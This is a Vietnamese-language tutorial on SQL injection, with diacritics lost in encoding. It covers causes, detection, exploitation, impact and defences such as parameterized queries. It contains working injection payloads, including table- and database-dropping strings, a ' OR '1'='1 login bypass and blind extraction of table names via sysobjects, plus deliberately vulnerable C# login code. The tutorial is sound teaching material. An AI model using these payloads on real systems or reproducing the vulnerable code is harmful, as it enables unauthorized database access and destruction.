TI LIU HNG DN SQL INJECTION

a. 1. Tng Quan nh ngha SQL injection l mt k thut cho php nhng k tn cng thi hnh cc cu lnh truy vn SQL bt hp php (khng c ngi pht trin lng trc) bng cch li dng l hng trong vic kim tra d liu nhp trong cc ng dng web. Hu qu ca n rt tai hi v n cho php nhng k tn cng c th thc hin cc thao tc xa, hiu chnh, do c ton quyn trn c s d liu ca ng dng. Li ny thng xy ra trn cc ng dng web c d liu c qun l bng cc h qun tr CSDL nh SQL Server, Oracle, DB2,Sysbase. b. Phn loi SQL Injection L nhng li thuc v cu lnh truy vn SQL trc tip vo database v ta c th nhn thy hoc suy on c. Blind SQL Injection 2. Nguyn nhn a phn li sql injection u do t ngi lp trnh, nhng nguyn nhn c th gy ra li v d b khai thc nh : a. Khng kim tra k t khi truy vn.:

y l dng li SQL injection xy ra khi thiu on m kim tra d liu u vo trong cu truy vn SQL. Kt qu l ngi dng cui c th thc hin mt s truy vn khng mong mun i vi c s d liu ca ng dng. Dng m sau s minh ha li ny:
statement = "SELECT * FROM users WHERE name = '" + userName + "';"

Cu lnh ny c thit k tr v cc bn ghi tn ngi dng c th t bng nhng ngi dng. Tuy nhin, nu bin "userName" c nhp chnh xc theo mt cch no bi ngi dng c , n c th tr thnh mt cu truy vn SQL vi mc ch khc hn so vi mong mun ca tc gi on m trn. V d, ta nhp vo gi tr ca bin userName nh sau:
b. S l khng ng kiu

Li SQL injection dng ny thng xy ra do lp trnh vin hay ngi dng nh ngha u vo d liu khng r rng hoc thiu bc kim tra v lc kiu d liu u vo. iu ny c th xy ra khi mt trng s c s dng trong truy vn SQL nhng lp trnh vin li thiu bc kim tra d liu u vo xc minh kiu ca d liu m ngi dng nhp vo c phi l s hay khng. V d nh sau:
statement := "SELECT * FROM data WHERE id = " + a_variable + ";"

Ta c th nhn thy mt cch r rng nh ca tc gi on m trn l nhp vo mt s tng ng vi trng id - trng s. Tuy nhin, ngi dng cui, thay v nhp vo mt s, h c th nhp vo

mt chui k t, v do vy c th tr thnh mt cu truy vn SQL hon chnh mi m b qua k t thot. V d, ta thit lp gi tr ca bin a_variable l:
1;DROP TABLE users

khi , n s thc hin thao tc xa ngi dng c id tng ng khi c s d liu, v cu truy vn hon chnh c hiu l:
SELECT * FROM DATA WHERE id = 1;DROP TABLE users;

c.

Li bo mt bn trong my ch CSDL

i khi l hng c th tn ti chnh trong phn mm my ch c s d liu, nh l trng hp hm mysql_real_escape_string() ca cc my ch MySQL. iu ny s cho php k tn cng c th thc hin mt cuc tn cng SQL injection thnh cng da trn nhng k t Unicode khng thng thng ngay c khi u nhp vo ang c thot.
d. Blind SQL injection 3. Cch tn cng, Cch pht hin

a. SQL Injection Cch pht hin

Pht hin qua thay i QueryString Thng thng th kim tra li SQL injection dng th nht, ta thng thm du ' (du nhy) vo pha sau cc a ch c dng: user.php?id=1 hoc user.php?id= . vd: http://site.com/user.php?id=1' v http://site.com/user.php?id=' u c. Tng t, ti cc form nhp nh, Tm kim, ng nhp test th nhp vi du nhy n v submit. S dng mt s Tool scan Url xem c b li SQL Injection hay khng. a. Cch tn cng u tin, Tm kim trang b li SQL Injection S dng cc cch pht hin trn tm ra mt trang b dnh li SQL Injection. VD

Cch tn cng. VD1. Tn cng qua QueryString. http://yoursite.com/index.aspx?category=food VD Nh trang ny nhn vo show Query category=food hin th ra danh sch cc sn phm thuc danh mc c tn = food. VD code c dng String catQuery = Request.QueryString[catetogy]; String strQuery = Select * from tblProduct where ProductCat = +catQuery + excute.. DB on xu food s c truyn vo cu truy vn ly ra d liu. Trong v d trn catQuery s bng food. Cu query DB s tr thnh Select * from tblProduct where ProductCat = food

Dng query trn s tr v mt tp resultset cha mt hoc nhiu dng ph hp vi iu kin WHERE ProductCat =' food' Nu thay i URL trn thnh http://yoursite.com/index.aspx?category=food' or 1=1-- , bin catQuery s cha gi tr "food' or 1=1-- " v dng lnh SQL query s l: SELECT * FROM tblProduct WHERE ProductCat ='food' or 1=1 --' Dng query trn s select mi th trong bng product bt chp gi tr ca trng PCategory c bng 'food' hay khng. Hai du gch ngang (--) ch cho MS SQL server bit ht dng query, mi th cn li sau "--" s b b qua. Nguy him c th xa bng, DropDB. VD Nh khai thc SQL injection ta bit c tn database, tn bng v cc ct trong bng. gi s ta bit c tn Database l ShopExam. C th drop database ny qua query string : http://yoursite.com/index.aspx?category=food'; drop database ShopExam -lc y cu truy vn s l SELECT * FROM tblProduct WHERE ProductCat ='food' drop database ShopExam Ngoi ra ta c th chn thm cc cu lnh SQL nh Update, Insert mt Record cha thng tin ca Admin c th s dng d liu va thm ( update ) ng nhp vo site. VD2. Tn cng vt quyn ng nhp. - Vi dng tn cng ny, tin tc c th d dng vt qua cc trang ng nhp nh vo li khi dng cc cu lnh SQL thao tc trn c s d liu ca ng dng web. - Xt mt v d in hnh, thng thng cho php ngi dng truy cp vo cc trang web c bo mt, h thng thng xy dng trang ng nhp yu cu ngi dng nhp thng tin v tn ng nhp v mt khu. Sau khi ngi dng nhp thng tin vo, h thng s kim tra tn ng nhp v mt khu c hp l hay khng quyt nh cho php hay t chi thc hin tip. - Trong trng hp ny, ngi ta c th dng hai trang, mt trang HTML hin th form nhp liu v mt trang ASPX dng x l thng tin nhp t pha ngi dng. V d: Login.aspx
<table width="300" border="0" cellpadding="2" cellspacing="2"> <tr> <td width="100">Username</td> <td> <asp:TextBox ID="txtUsername" runat="server"></asp:TextBox> </td> </tr> <tr> <td>Password</td> <td> <asp:TextBox ID="txtPassword" runat="server"></asp:TextBox> </td> </tr> <tr> <td colspan="2" align="center"> <asp:Button ID="btnSubmit" runat="server" Text="ng Nhp" onclick="btnSubmit_Click" /> </td> </tr> </table>

Login.aspx.cs
SqlConnection cnn = DataConnect.getConnection(); cnn.Open(); SqlCommand cmd = new SqlCommand("select * from tbluser where userName = '" + txtUsername.Text.Trim() + "' And UserPassword = '" + txtPassword.Text.Trim() + "'", cnn); SqlDataReader rs = cmd.ExecuteReader(); if (rs.HasRows) { while (rs.Read()) { ltlMsg.Text = "<h1>ng nhp thnh cng : Username: " + rs["userName"].ToString() + "</h1>"; break; } } else { ltlMsg.Text = "<h1>Sai ti khon hoc mt khu</h1>"; } cnn.Close();

VD Nu gi ta nhp vo 2 Username v password vi value : ' OR '1' = '1 Lc y cu truy vn SqlCommand s c dng select * from tbluser where userName = '' OR '1' = '1' And UserPassword = '' OR '1' = '1' b. Blind SQL injection Cch pht hin : Test th qua xu truy vn. Pht hin li "blind sql injection": V d ta c URL nh sau : http://www.company.com/pressRelease.jsp?pressID=5 v cu lnh SQL c thc hin s l : SELECT title,description,releaseDate,body FROM pressReleases WHERE pressID=5 xc nh xem n c b dinh li blind sql injection ko ta hy th thm vo 1 iu kin ng .V d nh: http://www.company.com/pressRelease.jsp?pressID=5 AND 1=1 v nu database server thc hin lnh SELECT title,description,releaseDate,body FROM pressReleases WHERE pressID=5 AND 1=1 v nu ta vn c tr v v tr ca http://www.company.com/pressRelease.jsp?pressID=5 th c ngha l n dnh li ri y . S dng Tool scan. Cch khai thc li. By gi chng ta s on cc thng tin ca database bng vic thc hin cc cu hi ng sai vi server V d : ta s hi server xem " c phi user hin ti l dbo ko?" bng cch : http://www.company.com/pressRelease.jsp?pressID=5 AND USER_NAME()='dbo' ( USER_NAME() l 1 hm ca SQL Server tr v tn ca user hin ti )

Nu user hin tai ng l 'dbo' th chng ta s c tr v http://www.company.com/pressRelease.jsp? pressID=5 cn nu ko th s ko c trang no c tr v c. Bng cch so sanh cc cu hi nh vi cc hm ta c th hi nhiu cu phc tp hn . Sau y l v d v cch ly tn ca 1 table ( tng ch 1 ) : http://www.company.com/pressRelease.jsp?pressID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1,1)))>109 Lnh SELECT s yu cu tn ca table u tin trong database Hm substring() s tr v ch u tin trong kt qu ca cu ln Hm lower() n gin ch l chuyn k t thnh kiu ch thng, ko vit hoa. Hm ascii() s tr v gi tr ASCII ca k t

Nu server ko bo li g th chng ta c th bit rng tn u tin ca table l mt ch sau ch "m" ( v trong bng m gi tr ca ch "m" l 109 ) Tip theo : http://www.company.com/pressRelease.jsp?pressID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1,1)))>116 Nu bo li tc l ta bit c gi tr ASCII ca k t u tin ny nm trong khong t ch "n" n ch "t" ( gi tr ca t l 116) C th thu hp dn ta s c gi tr ca k t u tin s nm trong khong "n" v "o" ( 110 v 111) Tip theo: http://www.company.com/pressRelease.jsp?pressID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1,1)))=111 Server ko bo li m tr v trang http://www.company.com/pressRelease.jsp?pressID=5 <--vy l ta bit c k t u tin ca table l "o" on tip k t th 2 ta lm nh sau : http://www.company.com/pressRelease.jsp?pressID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 2,1)))>109 (ch ta phi i i s t 1 sang 2 ) v ri lm li nh th , dn dn ta s nhn c tn y ca table ( trong v d ny l "orders") B k t ASCII gm 256 k t c phn b nh sau: + 32 k t u l cc k t iu khin ko in c v d nh k t ENTER ( m 13) , k t ESC ( m 27) + cc m 32-47,58-64,91-96 v 123-127 l cc k t c bit nh du chm, chm phy , du ngoc , mc , hi ..... + cc m 48-57 l 10 ch s + cc m 65-90 l cc ch ci hoa A->Z + cc k t 97-122 l cc ch ci thng a->z + cc m ASSCII l cc k t ha

4. Mc nh hng. a. Mt d liu & sai lch d liu hoc b chn nhng d liu thiu tnh ng n. V bn cht ca SQL Injection l tn cng vo Database, v th mt khi database b tn cng, chng ta s phi i mt vi nhng ri ro rt ln nh : B drop Database, DropTable. B mt & tht thot nhng thng tin nhy cm B thay i thng tin, sai lch thng tin B chim quyn Admin 5. Cch phng chng a. Kim tra tnh ng n ca d liu : V d, ta c 1 query string c dng : /Product.aspx?ID=100 Ly ID qua querystring get d liu tng ng. bin get d liu nn dng Int v p kiu v ng kiu cn thit.
int _ID; try { _ID = Convert.ToInt32(Request.QueryString["ID"]); } catch { _ID = 0; }

b. Loi b cc k t nhy n trong cu truy vn query C th s dng Regular hoc Replace trong code v hiu ha cc cu truy vn c cha n cc t kha ca DB, c bit l du nhy n.

c. S dng Parameters v OleDbCommand thay cho cu truy vn trc tip.

Vic s dng Parameters trong .NET bn thn n s t kim tra tnh ng n ca d liu v chng c Injection. VD
SqlCommand cmd = new SqlCommand("select * from tbluser where userName = @Username And UserPassword = @UserPassword", cnn); cmd.Parameters.Add(new SqlParameter("@Username", System.Data.SqlDbType.NVarChar)); cmd.Parameters.Add(new SqlParameter("@UserPassword", System.Data.SqlDbType.NVarChar)); cmd.Parameters["@Username"].Value = txtUsername.Text.Trim(); cmd.Parameters["@UserPassword"].Value = txtPassword.Text.Trim();

d. Ch s dng cc Store cn thit, c th xa cc Store khng dng trong DB master nh :

1. 2. 3. 4. xp_cmdshell xp_startmail xp_sendmail sp_makewebtask

e. Khng nn s dng user SA, Nu ch truy vn d liu set quyn Permisstion cho tng user ch c trn nhng DB cn thit.

6. Demo link tham kho a. Code Project km theo Codeproject km theo c code demo cc li sqlinjection c bn v cch phng chng. b. Cc trang demo hng dn v cch thc tn cng, phng trnh. 1. http://unixwiz.net/techtips/sql-injection.html 2. http://msdn.microsoft.com/en-us/library/ms161953.aspx 3. http://sqlzoo.net/hack/

7. Tool h tr & test

a. Test bng tay Test th cng bng cch thm du nhy n vo cc xy truy vn, cc form nhp liu. b. SQL Injection Add On Firefox Tool h tr kim tra test li SQL injection tch hp trn firefox. Download ti a ch : https://addons.mozilla.org/vi/firefox/addon/6727/ c. BSQL Hacker Tool h tr scan SQL Injection, xem video hng dn v download ti a ch : http://labs.portcullis.co.uk/application/bsql-hacker/